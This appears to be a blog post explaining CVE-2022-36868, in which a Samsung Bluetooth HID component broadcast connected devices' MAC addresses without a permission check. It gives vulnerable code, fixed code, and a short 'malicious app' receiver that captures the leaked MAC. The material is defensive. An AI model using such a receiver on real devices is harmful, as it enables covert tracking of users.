In late 2022, cybersecurity researchers uncovered a critical security flaw in the MouseNKeyHidDevice system on select Samsung devices. Catalogued as CVE-2022-36868, this vulnerability was due to the improper restriction of broadcasting Intents, which could cause the MAC address of connected Bluetooth devices to be leaked. In this post, we will explain what went wrong, how this could be exploited, and how you can stay safe.

What is MouseNKeyHidDevice?

MouseNKeyHidDevice is a system component found on some Samsung smartphones and tablets, managing the connection and interaction of external Bluetooth devices like mice and keyboards. Since Bluetooth devices use MAC addresses (unique identifiers for hardware), securing this information is important.

- Cause: Improper restriction of broadcasting Intents.
- Effect: Any application (even without special permissions) can listen to broadcasts from MouseNKeyHidDevice and harvest the MAC address of connected Bluetooth devices.
- Impact: Attackers could use exposed MAC addresses for tracking, targeted attacks, or even exploiting other Bluetooth vulnerabilities.

This vulnerability existed in versions prior to Samsung’s Security Maintenance Release (SMR) for October 2022.

Code Example: How Was the Flaw Triggered?

Normally, broadcast Intents that carry sensitive data should either be kept private or be protected by permissions. Here, MouseNKeyHidDevice sent out a broadcast along these lines:

// Vulnerable code simplified
Intent intent = new Intent();
intent.setAction("com.samsung.bluetooth.device.CONNECTED");
intent.putExtra("MAC_ADDRESS", bluetoothDevice.getAddress());
context.sendBroadcast(intent); // No permission check!

Any app on the device could register a receiver like this:

// Malicious app code
BroadcastReceiver receiver = new BroadcastReceiver() {
    public void onReceive(Context context, Intent intent) {
        String mac = intent.getStringExtra("MAC_ADDRESS");
        Log.d("StolenMac", "Leaked MAC: " + mac);
    }
};

IntentFilter filter = new IntentFilter("com.samsung.bluetooth.device.CONNECTED");
context.registerReceiver(receiver, filter);
// Now waits for MACs to be broadcast and captured

Takeaway: No app permission or user intervention was required — just an app waiting for the broadcast.

References

- Samsung Security Bulletin - SVE-2022-36868
- MITRE CVE Entry - CVE-2022-36868

Secure code would look like this:

Intent intent = new Intent();
intent.setAction("com.samsung.bluetooth.device.CONNECTED");
intent.putExtra("MAC_ADDRESS", bluetoothDevice.getAddress());
context.sendBroadcast(intent, "com.samsung.permission.BLUETOOTH_ADMIN"); // Permission required!
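
A receiver permission only protects the broadcast if third-party apps cannot obtain it, so the sketch below goes one step further than the snippet above. It is an added example, not Samsung's code: the class name, permission name and trusted package are hypothetical placeholders, and the action string is the simplified one used in this post.

```java
import android.content.Context;
import android.content.Intent;
import android.content.pm.PackageManager;
import android.content.pm.PermissionInfo;

/** Added example (hypothetical class): sends the connect event to one trusted app only. */
public final class HidConnectionNotifier {
    // Action string is the simplified one used in this post.
    static final String ACTION = "com.samsung.bluetooth.device.CONNECTED";
    // Placeholders: a permission the sender's own package declares, and the one intended consumer.
    static final String RECEIVER_PERMISSION = "com.example.hid.permission.RECEIVE_HID_EVENTS";
    static final String TRUSTED_PACKAGE = "com.example.hid.settings";

    private HidConnectionNotifier() { }

    /** Returns true if the broadcast was sent, false if the guard refused to send it. */
    public static boolean notifyConnected(Context context, String macAddress) {
        if (!isSignaturePermission(context, RECEIVER_PERMISSION)) {
            // A "normal" permission is granted to any app that lists it in its manifest,
            // so it would not keep the MAC address away from third-party apps.
            return false;
        }
        Intent intent = new Intent(ACTION);
        intent.setPackage(TRUSTED_PACKAGE);                  // deliver to this package only
        intent.putExtra("MAC_ADDRESS", macAddress);
        context.sendBroadcast(intent, RECEIVER_PERMISSION);  // receiver must hold the permission
        return true;
    }

    /** True only when the permission exists and its base protection level is "signature". */
    static boolean isSignaturePermission(Context context, String permission) {
        try {
            PermissionInfo info = context.getPackageManager().getPermissionInfo(permission, 0);
            return info.getProtection() == PermissionInfo.PROTECTION_SIGNATURE; // API 28+
        } catch (PackageManager.NameNotFoundException e) {
            return false; // permission not defined on this device: fail closed
        }
    }
}
```

The placeholder permission would be declared in the sender's manifest with `android:protectionLevel="signature"`, so only apps signed with the same key can hold it.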

Conclusion

CVE-2022-36868 is a potent reminder that even minor coding mistakes — like improperly protected broadcasts — can have a big impact. While Samsung moved quickly to patch the issue, millions of phones might remain unpatched. Always keep your system updated and be cautious about the apps you install.

Stay safe, and keep your devices (and your privacy) protected!

*For further reading, check out the official Samsung release notes from October 2022, and follow updates about mobile vulnerabilities on the MITRE CVE Database.*

Timeline

Published on: 10/07/2022 15:15:00 UTC
Last modified on: 10/11/2022 19:03:00 UTC